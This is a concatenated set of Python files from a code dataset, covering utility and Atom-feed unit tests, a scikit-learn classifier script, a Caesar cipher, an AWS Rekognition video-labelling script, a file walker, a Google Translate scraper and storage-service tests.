def test_format_command(self):\n cmdline = 'chmod 600 server.key'\n self.assertEqual(util.format_command(['chmod', 600, 'server.key']), cmdline)\n self.assertEqual(util.format_command(cmdline), cmdline)\n\n def test_basename(self):\n self.assertEqual(util.basename('dir/foobar'), 'foobar')\n self.assertEqual(util.basename('foobar'), 'foobar')\n self.assertEqual(util.basename('./foobar'), 'foobar')\n self.assertEqual(util.basename('../foobar'), 'foobar')\n self.assertEqual(util.basename(''), '')\n\n def test_temp_dir(self):\n with util.temp_dir() as dirname:\n self.assertTrue(osp.isdir(dirname))\n\n self.assertFalse(osp.exists(dirname))\n\n def test_temp_dir_fixed_name(self):\n with util.temp_dir('pyuginx') as dirname:\n self.assertEqual(osp.basename(dirname), 'pyuginx')\n self.assertTrue(osp.isdir(dirname))\n\n self.assertFalse(osp.exists(dirname))\n\n def test_temp_file(self):\n with util.temp_file() as filename:\n self.assertTrue(osp.isfile(filename))\n\n self.assertFalse(osp.exists(filename))\n\n def test_read_write_file(self):\n with util.temp_file() as filename:\n util.write_file(filename, 'content')\n self.assertEqual(util.read_file(filename), 'content')\n\n def test_parse_config(self):\n config = util.parse_config('''\n [section]\n name=value\n ''')\n self.assertEqual(config['section']['name'], 'value')\n\n def test_config_str(self):\n config = util.parse_config('''\n [server]\n server_name = localhost\n # Number of worker processes\n workers = 2\n\n [database]\n host = localhost\n db_name = pyuginx\n\n [misc]\n ''')\n exp_config_str = util.dedent('''\n [server]\n server_name = localhost\n workers = 2\n\n [database]\n host = localhost\n db_name = pyuginx\n\n [misc]\n ''')\n self.assertEqual(exp_config_str, str(config))\n\n def test_config_str_empty(self):\n config = util.parse_config('')\n self.assertEqual(str(config), '')\n\n def test_config_update(self):\n config = util.parse_config('''\n [server]\n server_name = localhost\n port = 80\n ''')\n config.update(util.parse_config('''\n [server]\n server_name =\n port = 8080\n\n [google]\n search_url=https://www.google.com\n\n [empty]\n '''))\n exp_config_str = util.dedent('''\n [server]\n server_name = localhost\n port = 8080\n\n [google]\n search_url = https://www.google.com\n\n [empty]\n ''')\n self.assertEqual(exp_config_str, str(config))\n\n def test_to_enum(self):\n\n class Color(Enum):\n red = 1\n green = 2\n blue = 3\n\n self.assertEqual(util.to_enum(Color, None), None)\n self.assertEqual(util.to_enum(Color, 2), Color.green)\n self.assertEqual(util.to_enum(Color, 'blue'), Color.blue)\n self.assertEqual(util.to_enum(Color, Color.red), Color.red)\n\n self.assertRaisesRegex(\n ValueError,\n re.escape('Invalid Color value 0, must be one of [1, 2, 3]'),\n util.to_enum, Color, 0)\n\n self.assertRaisesRegex(\n ValueError,\n re.escape(\"Invalid Color name 'purple', must be one of ['red', 'green', 'blue']\"),\n util.to_enum, Color, 'purple')\n\n self.assertRaisesRegex(\n ValueError,\n 'not a valid',\n util.to_enum, Color, self)\n","sub_path":"pyuginx-3/pyuginx/testutil.py","file_name":"testutil.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"622638693","text":"from sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.externals import joblib\nfrom 
imblearn.over_sampling import SMOTE, ADASYN, RandomOverSampler\n\nimport os.path as path\nimport numpy as np\nimport pandas as pd\nimport timeit\n\ndef gradientBoosting(state=42):\n    gradientBoostingClassifier = GradientBoostingClassifier(\n        loss='deviance', \n        learning_rate=0.1, \n        n_estimators=100, \n        subsample=1.0, \n        criterion='friedman_mse', \n        min_samples_split=2, \n        min_samples_leaf=1, \n        min_weight_fraction_leaf=0.0, \n        max_depth=100, \n        min_impurity_decrease=0.0, \n        min_impurity_split=None, \n        init=None, \n        random_state=state, \n        max_features=None, \n        verbose=0, \n        max_leaf_nodes=None, \n        warm_start=False, \n        presort='auto'\n    )\n    return (gradientBoostingClassifier, \"Gradient Boosting\")\n\ndef randomForest(state=42):\n    randomForestClassifier = RandomForestClassifier(\n        n_estimators=50, \n        criterion='entropy', \n        max_depth=None, \n        min_samples_split=5, \n        min_samples_leaf=5, \n        min_weight_fraction_leaf=0.0, \n        max_features=None, \n        max_leaf_nodes=None, \n        min_impurity_decrease=0.0, \n        min_impurity_split=None, \n        bootstrap=True, \n        oob_score=False, \n        n_jobs=1, \n        random_state=state, \n        verbose=0, \n        warm_start=False, \n        class_weight=None\n    )\n    return (randomForestClassifier, \"Random Forest\")\n\ndef svm(state=42):\n    linearSVC = LinearSVC(\n        penalty='l2', \n        loss='squared_hinge', \n        dual=True, \n        tol=0.0001, \n        C=1.0, \n        multi_class='ovr', \n        fit_intercept=True, \n        intercept_scaling=1, \n        class_weight=None, \n        verbose=0, \n        random_state=state, \n        max_iter=1000\n    )\n    return (linearSVC, \"SVM\")\n\ndef mlp(state=42):\n    mlpClassifier = MLPClassifier(\n        hidden_layer_sizes=5,\n        activation='tanh',\n        batch_size=100,\n        learning_rate='adaptive',\n        max_iter=1000,\n        random_state=state,\n        # verbose=True,\n        early_stopping=False,\n        tol=10,\n    )\n    return (mlpClassifier,\"MLP\") \n\ndef dividir(answerAll=42):\n    np.random.seed(answerAll)\n\n    data_set = pd.read_csv('data/TRN',sep='\\t')\n    data_set.drop_duplicates(inplace=True) # Remove duplicate examples\n\n    # We could also convert the data to arrays instead of DataFrames\n    # X = data_set.iloc[:, :-3].values\n    # y = data_set.iloc[:, -1].values\n\n    # Split features and target for building the model\n    X = data_set.drop(['INDEX', 'IND_BOM_1_1', 'IND_BOM_1_2'], axis=1)\n    y = data_set['IND_BOM_1_1']\n\n    \n    # Train: 50%, validation: 25%, test: 25%\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=1/4, \n        random_state=answerAll, stratify=y)\n    #X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=1/3, \n    #    random_state=answerAll, stratify=y_train)\n\n    # train_test_split(y, shuffle=False)\n\n    # X_resampled, y_resampled = SMOTE(kind='borderline1').fit_sample(X_train, y_train)\n\n    ros = RandomOverSampler(random_state=answerAll)\n    X_resampled, y_resampled = ros.fit_sample(X_train, y_train)\n\n    return (X_resampled, y_resampled, X_test, y_test)\n\n\ndef metricas(classifier, X_test, y_test, name = \"Classifier\"):\n    \n    score = classifier.score(X_test, y_test)\n    accuracy = cross_val_score(classifier, X_test, y_test, scoring='accuracy')\n    average_precision = cross_val_score(classifier, X_test, y_test, scoring='average_precision')\n    precision = cross_val_score(classifier, X_test, y_test, scoring='precision')\n    recall = cross_val_score(classifier, X_test, y_test, scoring='recall')\n    roc_auc = cross_val_score(classifier, X_test, y_test, scoring='roc_auc')\n    \n    score = f'Score: {score}'\n    accuracy = f'Accuracy: {accuracy}'\n    average_precision = f'average_precision: {average_precision}'\n    precision = f'precision: {precision}'\n    recall = f'recall: {recall}'\n    roc_auc = f'roc_auc: {roc_auc}'\n\n    return [score, accuracy, average_precision, precision, recall, roc_auc]\n\n\ndef saveLog(classifier, metricas, file_name, time, name):\n    \n    name = \"log/\" + name + \".txt\"\n    texto = []\n    try:\n        arquivo = open(name, 'r')\n        texto = arquivo.readlines()\n        arquivo = open(name, 'w')\n    except FileNotFoundError:\n        arquivo = open(name, 'w')\n    \n    texto.append(\"Trained model:\\n\")\n    texto.append(file_name)\n    texto.append(\"\\n\\nTraining time:\\n\")\n    texto.append(\"{0:.2f}s\".format(time))\n    texto.append(\"\\n\\nClassifier configuration:\\n\")\n    texto.append(classifier.__str__())\n    texto.append(\"\\n\\nClassifier metrics:\\n\")\n    \n    for metrica in metricas:\n        texto.append(metrica+\"\\n\")\n\n    texto.append(\"---------------------------------------------------------\\n\\n\")\n\n    # write to the file\n    arquivo.writelines(texto)\n    arquivo.close()\n\ndef saveModel(classifier, name = \"Classifier\"):\n\n    name = \"log/\" + name\n    i = 0\n    while path.isfile(name + '_' + str(i) + '.pkl'):\n        i = i + 1\n\n    name_new = name + \"_\" + str(i) + \".pkl\"\n    joblib.dump(classifier, name_new)\n    return name_new\n\ndef main():\n\n    answerAll = 42\n    start = timeit.default_timer()\n\n    # split the input data\n    X_train, y_train, X_test, y_test = dividir(answerAll)\n\n    loadModel = False\n\n    if loadModel:\n        # saved classifiers\n        name = \"MLP\"\n        path = \"log/MLP_0.pkl\"\n        classifier = joblib.load(path) \n\n        metricas_list = metricas(classifier, X_test, y_test, name)\n        print(\"Classifier metrics: \" + name)\n        for metrica in metricas_list:\n            print(metrica)\n\n        stop = timeit.default_timer()\n        print(\"Execution time: {0:.2f}s\".format(stop - start))\n    else:\n        \n        # classifiers\n        classifier, name = gradientBoosting(answerAll)\n        # classifier, name = randomForest(answerAll)\n        # classifier, name = svm(answerAll)\n        # classifier, name = mlp(answerAll)\n        \n        # train the model\n        classifier.fit(X_train, y_train)\n\n        # print the metric results\n        metricas_list = metricas(classifier, X_test, y_test, name)\n        print(\"Classifier metrics: \" + name)\n        for metrica in metricas_list:\n            print(metrica)\n\n        name_model = saveModel(classifier, name)\n        stop = timeit.default_timer()\n        time = stop - start\n        print(\"Execution time: {0:.2f}s\".format(time))\n        saveLog(classifier, metricas_list, name_model, time, name)\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"exemplo.py","file_name":"exemplo.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"570709632","text":"# -*- coding: utf-8 -*-\n# pylint: disable=protected-access\n\"\"\"Unit tests for h/atom_feed.py.\"\"\"\nimport datetime\n\nimport mock\n\nfrom h import atom_feed\nfrom . 
import factories\n\n\ndef _mock_annotation_url_function():\n    annotation_url = mock.Mock()\n    annotation_url.return_value = \"http://example.com/annotations/12345\"\n    return annotation_url\n\n\ndef _mock_annotation_api_url_function():\n    annotation_url = mock.Mock()\n    annotation_url.return_value = \"http://example.com/annotations/12345.json\"\n    return annotation_url\n\n\ndef test_entry_id():\n    \"\"\"Entry IDs should be tag URIs based on domain, day and annotation ID.\"\"\"\n    annotation = factories.Annotation(\n        id=\"12345\",\n        created=datetime.datetime(year=2015, month=3, day=19).isoformat())\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    assert entry[\"id\"] == \"tag:example.com,2015-03-19:12345\"\n\n\ndef test_entry_author_name():\n    \"\"\"Entries should have an author name based on the annotation user name.\"\"\"\n    annotation = factories.Annotation(username=\"jon\")\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    assert entry[\"author\"][\"name\"] == \"jon\"\n\n\ndef test_entry_title():\n    \"\"\"Entries should have a title based on the annotated document's title.\"\"\"\n    title = \"My Test Document\"\n    annotation = factories.Annotation(document_title=title)\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    assert entry[\"title\"] == title\n\n\ndef test_entry_published_date():\n    datestring = \"2015-03-18T12:44:17.551191+00:00\"\n    annotation = factories.Annotation(created=datestring)\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    assert entry[\"published\"] == datestring\n\n\ndef test_entry_updated_date():\n    datestring = \"2015-03-19T11:27:17.551191+00:00\"\n    annotation = factories.Annotation(updated=datestring)\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    assert entry[\"updated\"] == datestring\n\n\ndef test_entry_content_includes_selected_text():\n    \"\"\"The entry content should include the selected text in a blockquote.\"\"\"\n    text = \"Some annotated text from a web page\"\n    annotation = factories.Annotation(exact_text=text)\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    assert (\n        \"<blockquote>{text}</blockquote>\".format(text=text)\n        in entry[\"content\"])\n\n\ndef test_entry_content_includes_annotation_text():\n    \"\"\"The entry content should include the annotation note.\"\"\"\n    text = \"A test annotation\"\n    annotation = factories.Annotation(text=text)\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    assert text in entry[\"content\"]\n\n\ndef test_entry_content_is_escaped():\n    \"\"\"'&', '<' and '>' should be escaped in entry contents.\"\"\"\n    text = \"An annotation with <b>HTML</b> in it, &#374;\"\n    exact_text = \"Some <i>web page</i> text &#355;\"\n    annotation = factories.Annotation(text=text, exact_text=exact_text)\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    for s in [\"<b>\", \"</b>\", \"<i>\", \"</i>\", \"&#374;\", \"&#355;\"]:\n        assert s not in entry[\"content\"]\n\n\ndef test_html_link():\n    \"\"\"Entries should have links to their HTML representation.\"\"\"\n    annotation = factories.Annotation()\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    entry = feed[\"entries\"][0]\n    matching_links = [l for l in entry[\"links\"]\n                      if l[\"href\"] == \"http://example.com/annotations/12345\"]\n    assert len(matching_links) == 1\n    matching_link = matching_links[0]\n    assert matching_link[\"rel\"] == \"alternate\"\n    assert matching_link[\"type\"] == \"text/html\"\n\n\ndef test_json_link():\n    \"\"\"Entries should have links to their JSON representation.\"\"\"\n    annotation = factories.Annotation()\n\n    feed = atom_feed._feed_from_annotations(\n        [annotation], atom_url=None,\n        annotation_url=_mock_annotation_url_function(),\n        annotation_api_url=_mock_annotation_api_url_function())\n\n    entry = feed[\"entries\"][0]\n    matching_links = [\n        l for l in entry[\"links\"]\n        if l[\"href\"] == \"http://example.com/annotations/12345.json\"]\n    assert len(matching_links) == 1\n    matching_link = matching_links[0]\n    assert matching_link[\"rel\"] == \"alternate\"\n    assert matching_link[\"type\"] == \"application/json\"\n\n\ndef test_feed_entries():\n    \"\"\"Feeds should contain the right entries in the right order.\"\"\"\n    annotations = [factories.Annotation(random_number=n) for n in range(1, 4)]\n\n    feed = atom_feed._feed_from_annotations(\n        annotations, atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    assert [entry[\"title\"] for entry in feed[\"entries\"]] == [\n        \"Example Document 1\", \"Example Document 2\", \"Example Document 3\"]\n\n\ndef test_feed_id():\n    \"\"\"The feed should use its own URL as its id.\"\"\"\n    atom_url = \"http://example.com/annotations.atom\"\n\n    feed = atom_feed._feed_from_annotations(\n        annotations=factories.Annotation.create_batch(3),\n        atom_url=atom_url,\n        annotation_url=_mock_annotation_url_function())\n\n    assert feed[\"id\"] == atom_url\n\n\ndef test_feed_title():\n    \"\"\"A custom title should be used as the feed title if given.\"\"\"\n    feed = atom_feed._feed_from_annotations(\n        title=\"My Custom Feed Title\",\n        annotations=factories.Annotation.create_batch(3), atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    assert feed[\"title\"] == \"My Custom Feed Title\"\n\n\ndef test_default_feed_title():\n    \"\"\"It should fall back to the default feed title if none is given.\"\"\"\n    feed = atom_feed._feed_from_annotations(\n        annotations=factories.Annotation.create_batch(3), atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    assert feed[\"title\"] == \"Hypothesis Stream\"\n\n\ndef test_feed_subtitle():\n    \"\"\"A custom subtitle should be used as the feed subtitle if given.\"\"\"\n    feed = atom_feed._feed_from_annotations(\n        subtitle=\"My Custom Feed Subtitle\",\n        annotations=factories.Annotation.create_batch(3), atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    assert feed[\"subtitle\"] == \"My Custom Feed Subtitle\"\n\n\ndef test_default_feed_subtitle():\n    \"\"\"It should fall back to the default feed subtitle if none is given.\"\"\"\n    feed = atom_feed._feed_from_annotations(\n        annotations=factories.Annotation.create_batch(3), atom_url=None,\n        annotation_url=_mock_annotation_url_function())\n\n    assert feed[\"subtitle\"] == \"The Web. 
Annotated\"\n\n\ndef test_feed_self_link():\n \"\"\"The given atom_url should be used in a rel=\"self\" link.\"\"\"\n atom_url = \"http://www.example.com/annotations.atom\"\n feed = atom_feed._feed_from_annotations(\n annotations=factories.Annotation.create_batch(3),\n atom_url=atom_url,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"links\"][0][\"href\"] == atom_url\n assert feed[\"links\"][0][\"rel\"] == \"self\"\n assert feed[\"links\"][0][\"type\"] == \"application/atom+xml\"\n\n\ndef test_feed_html_link():\n \"\"\"The given html_url should be used in a rel=\"alternate\" link.\"\"\"\n html_url = \"http://www.example.com/annotations.html\"\n feed = atom_feed._feed_from_annotations(\n html_url=html_url,\n annotations=factories.Annotation.create_batch(3), atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"links\"][1][\"href\"] == html_url\n assert feed[\"links\"][1][\"rel\"] == \"alternate\"\n assert feed[\"links\"][1][\"type\"] == \"text/html\"\n\n\ndef test_with_no_annotations():\n feed = atom_feed._feed_from_annotations(\n annotations=[], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"] == []\n\n\ndef test_annotation_with_no_target():\n annotation = factories.Annotation()\n del annotation[\"target\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"content\"] == annotation[\"text\"]\n\n\ndef test_annotation_with_no_text():\n text = \"Some annotated text from a web page\"\n annotation = factories.Annotation(exact_text=text)\n del annotation[\"text\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"content\"] == (\n \"<blockquote>{text}</blockquote>\".format(text=text))\n\n\ndef test_annotation_with_no_text_or_target():\n annotation = factories.Annotation()\n del annotation[\"target\"]\n del annotation[\"text\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"content\"] == \"\"\n\n\ndef test_annotation_with_no_document():\n annotation = factories.Annotation()\n del annotation[\"document\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"title\"] == \"\"\n\n\ndef test_annotation_with_no_document_title():\n annotation = factories.Annotation()\n del annotation[\"document\"][\"title\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"title\"] == \"\"\n\n\ndef test_annotation_with_non_unicode_characters():\n username = u\"seanh\\u2119h\"\n exact_text = u\"Some selected \\u01b4 non-ascii text\"\n document_title = u\"Non-ascii \\u2602 title\"\n text = u\"Some non-ascii \\u210c annotation text\"\n annotation = factories.Annotation(\n username=username,\n exact_text=exact_text,\n document_title=document_title,\n text=text)\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert entry[\"author\"][\"name\"] == username\n assert exact_text in entry[\"content\"]\n assert entry[\"title\"] == document_title\n assert text in 
entry[\"content\"]\n\n\ndef test_annotation_with_targets():\n annotation = factories.Annotation()\n annotation2 = factories.Annotation()\n\n target1 = annotation[\"target\"][0]\n target2 = annotation2[\"target\"][0]\n\n annotation[\"target\"] = [target1, target2]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert len(feed[\"entries\"][0][\"links\"]) == 3\n assert feed[\"entries\"][0][\"links\"][1][\"rel\"] == \"related\"\n assert feed[\"entries\"][0][\"links\"][1][\"href\"] == target1[\"source\"]\n assert feed[\"entries\"][0][\"links\"][2][\"rel\"] == \"related\"\n assert feed[\"entries\"][0][\"links\"][2][\"href\"] == target2[\"source\"]\n\n\ndef test_malformed_target():\n # This annotation has a broken target (a dict instead of a list), but we\n # shouldn't explode in this case.\n annotation = factories.Annotation()\n annotation['target'] = {\n 'selector': [\n {'start': None, 'end': None, 'type': 'TextPositionSelector'},\n {'exact': None, 'prefix': None, 'type': 'TextQuoteSelector', 'suffix': None}\n ]\n }\n\n feed = atom_feed._feed_from_annotations(\n [annotation],\n atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert len(feed[\"entries\"]) == 1\n","sub_path":"h/test/atom_feed_test.py","file_name":"atom_feed_test.py","file_ext":"py","file_size_in_byte":12382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"447727962","text":"from string import ascii_lowercase\ndef to_encrypt(text, delta):\n code = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'\n text = list(text)\n decrypt = []\n for elem in text:\n if elem in ascii_lowercase:\n decrypt.append(code[ascii_lowercase.index(elem) + delta])\n else:\n decrypt.append(elem)\n return ''.join(decrypt)\n\nprint(to_encrypt(\"a b c\", 3))\n","sub_path":"CheckIO/Home/caesar_cypher_encryptor.py","file_name":"caesar_cypher_encryptor.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"31501805","text":"\nimport json\nimport boto3\nimport cv2\nimport math\nimport io\n\ndef analyzeVideo():\n videoFile = \"cavity.mp4\"\n projectVersionArn = \"arn:aws:rekognition:us-east-2:695748283885:project/testTeeth/version/testTeeth.2021-06-01T14.55.16/1622577316603\"\n\n rekognition = boto3.client('rekognition', region_name = 'us-east-2') \n customLabels = ['hello'] \n cap = cv2.VideoCapture(videoFile)\n frameRate = cap.get(5) #frame rate\n while(cap.isOpened()):\n frameId = cap.get(1) #current frame number\n print(\"Processing frame id: {}\".format(frameId))\n ret, frame = cap.read()\n if (ret != True):\n break\n if (frameId % math.floor(frameRate) == 0):\n hasFrame, imageBytes = cv2.imencode(\".jpg\", frame)\n\n if(hasFrame):\n response = rekognition.detect_custom_labels(\n Image={\n 'Bytes': imageBytes.tobytes(),\n },\n ProjectVersionArn = projectVersionArn\n )\n \n for elabel in response[\"CustomLabels\"]:\n elabel[\"Timestamp\"] = (frameId/frameRate)*1000\n customLabels.append(elabel)\n \n print(customLabels)\n\n with open(videoFile + \".json\", \"w\") as f:\n f.write(json.dumps(customLabels)) \n\n cap.release()\n\nanalyzeVideo()","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"105195981","text":"#!/usr/bin/env python\nimport os\nfrom datetime import 
datetime\n\nstarting_dir = \".\"\n\nall_files = []\n\nfor curr_dir, dir_list, file_list in os.walk(starting_dir):\n if '.git' in dir_list:\n dir_list.remove('.git')\n print(curr_dir)\n for file_name in file_list:\n if file_name.endswith('.py'):\n file_path = os.path.join(curr_dir, file_name)\n file_size = os.path.getsize(file_path)\n raw_timestamp = os.path.getmtime(file_path)\n timestamp = datetime.fromtimestamp(raw_timestamp).date()\n\n all_files.append(\n (file_path, file_size, timestamp)\n )\n # print(\" {:5d} {} {}\".format(file_size, timestamp, file_name))\n\nprint(all_files[:10])\nprint()\n\nfor file_entry in sorted(all_files, key=lambda e: e[2]):\n print(file_entry)\n","sub_path":"walking_directories.py","file_name":"walking_directories.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"42296168","text":"import hashlib, time\nimport urllib.request\nimport sys\nimport re, requests, time\nfrom lxml import etree\n\ntyp = sys.getfilesystemencoding()\n\n\ndef translate1(querystr, to_l=\"zh\", from_l=\"en\"): # \"en\", \"fr\", \"auto\"\n '''for google tranlate by doom\n '''\n t = list(querystr)\n for i in range(0, len(t)):\n if ord(t[i]) > 127:\n t[i] = \"+\"\n querystr = ''.join(t)\n # print(querystr)\n C_agent = {\n 'User-Agent': \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.165063 Safari/537.36 AppEngine-Google.\"}\n flag = 'class=\"t0\">'\n tarurl = \"https://translate.google.com/?source=gtx_c#view=home&op=translate&sl=zh-CN&tl=en&text={}\".format(\n querystr.replace(\" \",\n \"+\")) # \"http://translate.google.com/m?hl=%s&sl=%s&q=%s\" % (to_l, from_l, querystr.replace(\" \", \"+\"))\n\n request = urllib.request.Request(tarurl, headers=C_agent)\n page = str(urllib.request.urlopen(request).read().decode(typ))\n target = page[page.find(flag) + len(flag):]\n target = target.split(\"<\")[0]\n return target\n\n\ndef translate(querystr, to_l=\"zh\", from_l=\"en\"): # \"en\", \"fr\", \"auto\"\n '''for google tranlate by doom\n '''\n t = list(querystr)\n for i in range(0, len(t)):\n if ord(t[i]) > 127:\n t[i] = \"+\"\n querystr = ''.join(t)\n # print(querystr)\n C_agent = {\n 'User-Agent': \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.165063 Safari/537.36 AppEngine-Google.\"}\n flag = 'class=\"t0\">'\n tarurl = \"http://translate.google.com/m?hl=%s&sl=%s&q=%s\" % (\n to_l, from_l, querystr.replace(\" \", \"+\")) # http://translate.google.com/m?hl=zh&sl=en&q=Summary.\n print(tarurl)\n data = requests.get(tarurl, headers=C_agent)\n time.sleep(0.1) ##\n response = etree.HTML(data.text)\n # print(data.text)\n result1 = response.xpath(\"//div[@class='result-container']/text()\")\n result2 = response.xpath(\"//div[@dir]/text()\")\n if len(result1) > 0:\n return result1[0]\n if len(result2) > 0:\n return result2[0]\n # return result1 or result2\n\n\nk = 0\n\nf1 = open(\"source.pts\", encoding='UTF-8')\nf = hashlib.md5()\nf.update(\"\".join(f1.readlines()).encode(\"utf-8\"))\nt0 = f.hexdigest()\nf1.close()\nprint(\"let's go\")\nwhile True:\n # print(\"this is a turn %d\" %(k))\n k += 1\n f1 = open(\"source.pts\", encoding='UTF-8')\n f = hashlib.md5()\n f.update(\"\".join(f1.readlines()).encode(\"utf-8\"))\n t1 = f.hexdigest()\n f1.close()\n\n if t1 == t0:\n pass\n else:\n t0 = t1\n o = open(\"target.pts\", \"w\", encoding=\"utf-8\")\n s = \"\"\n t = open(\"source.pts\", encoding='UTF-8')\n while 1:\n line = t.readline()\n if 
not line:\n break\n s += line.replace(\"\\n\", \" \")\n\n ###########\n s = s.replace(\"et al.\", \"et al+\").replace(\"etc.\", \"etc+\").replace(\"e.g.\", \"e+g+\").replace(\"i.e.\",\n \"i+e+\").replace(\n \"U.S.\", \"U+S+\").replace(\"Ph.D.\", \"PhD\").replace(\"e. g.\", \"e+g+\").replace(\"i. e.\", \"i+e+\")\n\n decimals = re.findall(\"(\\d+\\.\\d+)\", s)\n for _ in decimals:\n decimal = _.replace(\".\", \",\")\n s = s.replace(_, decimal)\n s = s.strip() # delete blank characters.\n # print(s)\n # print(s)\n\n ########## Edition 1\n for sen in re.split(\"\\.|\\?\", s):\n sen = sen.strip()\n # print(sen)\n if sen != \"\":\n o.write(sen + \".\" + \"\\n\")\n # print(sen + \".\")\n o.write(translate(sen + \".\") + \"\\n\" + \"\\n\")\n\n o.close()\n t.close()\n\n time.sleep(2)\n\n# print (md5.new(f1.read()).digest() == md5.new(f2.read()).digest())","sub_path":"paper_translating_scripts/md.py","file_name":"md.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"60997293","text":"# pylint: disable=redefined-outer-name\n# pylint: disable=unused-argument\n# pylint: disable=unused-variable\n\nimport hashlib\nimport tempfile\nfrom pathlib import Path\nfrom pprint import pformat\nfrom uuid import uuid4\n\nimport pytest\nfrom fastapi import UploadFile\nfrom models_library.api_schemas_storage import FileMetaDataGet as StorageFileMetaData\nfrom pydantic import ValidationError\nfrom simcore_service_api_server.models.schemas.files import File\nfrom simcore_service_api_server.modules.storage import to_file_api_model\n\nFILE_CONTENT = \"This is a test\"\n\n\n@pytest.fixture\ndef mock_filepath(tmpdir) -> Path:\n path = Path(tmpdir) / \"mock_filepath.txt\"\n path.write_text(FILE_CONTENT)\n return path\n\n\n@pytest.fixture\ndef expected_md5sum():\n #\n # $ echo -n \"This is a test\" | md5sum -\n # ce114e4501d2f4e2dcea3e17b546f339 -\n #\n expected_md5sum = \"ce114e4501d2f4e2dcea3e17b546f339\"\n assert hashlib.md5(FILE_CONTENT.encode()).hexdigest() == expected_md5sum\n return expected_md5sum\n\n\nasync def test_create_filemetadata_from_path(mock_filepath, expected_md5sum):\n file_meta = await File.create_from_path(mock_filepath)\n assert file_meta.checksum == expected_md5sum\n\n\nasync def test_create_filemetadata_from_starlette_uploadfile(\n mock_filepath, expected_md5sum\n):\n # WARNING: upload is a wrapper around a file handler that can actually be in memory as well\n\n # in file\n with open(mock_filepath, \"rb\") as file:\n upload = UploadFile(mock_filepath.name, file)\n\n assert upload.file.tell() == 0\n file_meta = await File.create_from_uploaded(upload)\n assert upload.file.tell() > 0, \"modifies current position is at the end\"\n\n assert file_meta.checksum == expected_md5sum\n\n # in memory\n # UploadFile constructor: by not passing file, it enforces a tempfile.SpooledTemporaryFile\n upload_in_memory = UploadFile(mock_filepath.name)\n\n assert isinstance(upload_in_memory.file, tempfile.SpooledTemporaryFile)\n await 